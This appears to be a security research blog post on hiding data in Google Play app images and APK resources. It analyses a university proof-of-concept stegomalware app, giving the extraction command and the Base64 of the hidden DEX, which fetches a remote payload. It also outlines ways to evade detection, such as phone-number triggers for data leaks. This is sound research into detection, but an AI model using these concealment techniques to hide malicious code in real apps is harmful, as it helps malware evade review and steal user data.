To do this, I will use two known steganographic techniques: adding information to the end of the file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
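As a rough illustration of the LSB idea, the following minimal sketch hides a message in the lowest bit of each byte of a raw pixel buffer and reads it back. It is an assumption-laden toy, not the algorithm used by any specific tool: the function names `embed_lsb` and `extract_lsb` are hypothetical, the buffer stands in for decoded pixel data, and no key or encryption is applied.

```python
def embed_lsb(pixels: bytes, message: bytes) -> bytes:
    """Return a copy of `pixels` with `message` stored in the lowest bit of each byte."""
    # Expand the message into individual bits, most significant bit first.
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(pixels):
        raise ValueError("cover buffer is too small for the message")
    stego = bytearray(pixels)
    for i, bit in enumerate(bits):
        # Clear the least significant bit, then set it to the message bit.
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)


def extract_lsb(pixels: bytes, length: int) -> bytes:
    """Rebuild `length` message bytes from the lowest bits of `pixels`."""
    out = bytearray()
    for i in range(length):
        value = 0
        for sample in pixels[i * 8:(i + 1) * 8]:
            value = (value << 1) | (sample & 1)
        out.append(value)
    return bytes(out)


# Hypothetical cover data: 256 bytes standing in for decoded pixel values.
cover = bytes(range(256))
stego = embed_lsb(cover, b"hi")
recovered = extract_lsb(stego, 2)
```

Each cover byte changes by at most one, which is why this kind of modification is hard to notice visually in an image.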
      
 
PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Look at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using OpenStego (key=alfonso)
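
For the EOF case in Example 1, the manual hex-editor check can be approximated in a few lines. This is a sketch under the assumption that the file is a well-formed PNG: a PNG is an 8-byte signature followed by chunks (4-byte length, 4-byte type, data, 4-byte CRC), and IEND is the last chunk, so anything after it is appended data. The function name `png_trailing_data` is hypothetical, and CRCs are not verified.

```python
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailing_data(data: bytes) -> bytes:
    """Return the bytes that follow the IEND chunk of a PNG file."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(data):
        # Each chunk starts with a big-endian length and a 4-byte type.
        length, chunk_type = struct.unpack(">I4s", data[offset:offset + 8])
        offset += 8 + length + 4  # chunk header + chunk data + CRC
        if chunk_type == b"IEND":
            return data[offset:]
    raise ValueError("IEND chunk not found")
```

A call such as `png_trailing_data(open("image.png", "rb").read())` (with `image.png` as a placeholder name) returns an empty byte string for an untouched image and the appended message otherwise.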
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous proofs, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (a covert channel using Google Play). The main question is whether an attacker could use the masked information for some evil purpose. Perhaps they could use images to encode executable code that triggers an exploit when you visit the website (using, for example, polyglots + stego exploits), or they might come up with another idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded to Google Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information. For example, machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information in those resources?

An attacker might want to conceal malicious code in these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).

After a few clicks on a specific screen, the app checks whether the phone's number is equal to the one stored in the picture. If the numbers match, the app can start leaking information (depending on the permissions granted to the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing it, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). This PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running and the user performs a series of actions, the app recovers the “new” DEX file from the image. This code runs and connects to a URL to fetch a payload (in this case harmless). The “bad” behavior of this application can only be detected if we analyze the resources of the app in detail or simulate the user interaction that triggers the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1: Download the APK to our local store. This requires a tool, such as an APK downloader extension or a website such as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimage\res\drawable-hdpi\likeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is harmless.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
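
A quick way to confirm what kind of data such a Base64 blob carries is to decode its beginning and compare it with a known file signature. The sketch below assumes only the first 12 characters of the payload shown above and checks them against the DEX header magic (`dex\n`, three ASCII version digits, and a NUL byte). The helper names `looks_like_dex` and `dex_version` are hypothetical.

```python
import base64


def looks_like_dex(blob: bytes) -> bool:
    """Check for the DEX magic: b"dex\\n", three ASCII digits, then a NUL byte."""
    return (
        len(blob) >= 8
        and blob[:4] == b"dex\n"
        and blob[4:7].isdigit()
        and blob[7] == 0
    )


def dex_version(blob: bytes) -> str:
    """Return the three-digit format version stored in the DEX magic."""
    return blob[4:7].decode("ascii")


# First 12 Base64 characters of the payload above (decodes to 9 bytes).
payload_prefix = "ZGV4CjAzNQDy"
header = base64.b64decode(payload_prefix)
is_dex = looks_like_dex(header)
version = dex_version(header)
```

Decoding the whole payload the same way and searching it for printable strings is a simple next step in judging whether it is harmless.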
 
The code that runs the payload:
 
Is Google detecting this “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2. Analyzing the current and previous versions of this app, I discovered connections to specific URLs (image files). Are these truly images? Not all of them.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:

Step 4. If we analyze these databases, it is possible to find curious messages, for example, recipes involving drugs.
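
The extension-renaming trick from Step 3 can be spotted by comparing a file's leading bytes with the signature its extension promises. The following is a minimal sketch, assuming only three well-known signatures (PNG, JPEG, and the SQLite 3 header string); the names `sniff_type` and `extension_mismatch` and the small lookup tables are hypothetical and far from exhaustive.

```python
# Leading bytes ("magic numbers") of a few well-known file formats.
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"SQLite format 3\x00", "sqlite"),
]

# File extension -> format the extension claims to be.
EXTENSIONS = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg",
              "db": "sqlite", "sqlite": "sqlite"}


def sniff_type(data: bytes) -> str:
    """Guess the format from the first bytes, or return "unknown"."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when a known extension disagrees with the sniffed content type."""
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = EXTENSIONS.get(ext)
    return expected is not None and sniff_type(data) != expected


# Synthetic example: SQLite header bytes stored under a .png name.
fake_image = b"SQLite format 3\x00" + bytes(84)
flagged = extension_mismatch("io.png", fake_image)
```

A check like this only catches the trivial renaming case; it says nothing about data hidden inside a file whose signature is genuine.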

Is Google aware of the information exchanged using their applications? This example is little more than a curiosity, but such procedures might violate the market's publication policies for certain applications, or lead to more serious things.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information in Google Play and in Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on previous research by the author at ElevenPaths.